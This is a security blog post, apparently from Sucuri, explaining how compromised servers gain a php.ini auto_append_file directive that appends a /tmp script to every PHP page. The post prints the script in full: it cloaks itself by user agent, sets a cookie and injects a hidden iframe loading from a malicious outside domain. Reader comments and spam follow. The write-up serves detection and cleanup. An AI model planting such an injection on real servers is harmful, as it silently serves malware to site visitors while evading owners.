Malware Being Called From Your php.ini File

Is your site infected with malware, and you can’t find it anywhere? It might be a good idea to search outside of your web directory, and look in your main configuration files (specially if you are on a dedicated/VPS server).

We are seeing an increased number of infected sites with malicious iframes, similar to this one:

<style type=”text/css”>#doxig {width: 10px;height: 10px;frameborder: no;visibility: hidden;scrolling: no;}</style><iframe id=”doxig” src="http://1306a95ajbr.liga4giurgiu.info/ad.jpg?2"></iframe>

These specific strings aren’t typically found anywhere in the website files, which is very concerning. We’re finding that entire servers are being compromised, and the main server php.ini file (/etc/php/php.ini) has the following setting added:

;auto_append_file = “0ff”

This simple line in the php.ini makes all the php scripts append the output of the file 0ff (/tmp/0ff) to them. So even if your files look clean, the malware is still displayed to anyone visiting the site.

This is the code of the 0ff file:

<?php
if(!@isset($_COOKIE[‘PHPSESS1D’]) &&
 !@preg_match(‘/; Yandex|; Googlebot|linux|macintosh|android|Symbian|iPhone|
Mac OS|Opera Mini|Chrome|Apple/i’,$_SERVER[‘HTTP_USER_AGENT’])) {
 echo ‘<script type="text/javascript">
 d=new Date();
 d&#46setDate(d&#46getDate()+1);
 document&#46cookie="PHPSESS1D=1; path=/; expires=" + d&#46toGMTString();
 </script>';
 echo ‘<style type="text/css">#doxig {width: 10px;height: 10px;frameborder: no;
visibility: hidden;scrolling: no;}</style><iframe id="doxig" src="
http://1306a95ajbr&#46liga4giurgiu&#46info/ad&#46jpg?2"></iframe>';
}

So if you are seeing those hidden iframes, try to look at your PHP and main Apache configurations.


Need help with malware? Need someone to clean your site? Sign up here: Sucuri

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • Shosha

    Yeah lol, a “vulnerability” that is a legitimate and docummented directive of PHP… If you leave your php.ini unprotected, it’s really your own fault, not phps…

  • Anonymous

    Anyway it’s a bad idea, most of distro’s around empty /tmp at boot by default. It will get deleted just rebooting.

  • SomeGuy

    How is the php.ini being modified, are you finding this happening in setups with incorrect permissions, are they being uploaded, or is another vulnerability being exploited?

  • http://www.pratikbilgiler.info/ bilgiler
  • Guest

    It might be a good idea to search outside
    of your web directory, and look in your main configuration files. I have share this blog to my friends. That is of great utility. Thanks for
    sharing this info.

    Hire PHP Developers | Hire PHP Programmers | PHP Website Development Company

  • http://www.smtrafficguru.com/ adri roy

    your thinking is really up to date and i really agree with your thinking with this matter.please write some more information in this matter.great article with useful information.
    http://www.smtrafficguru.com

Share This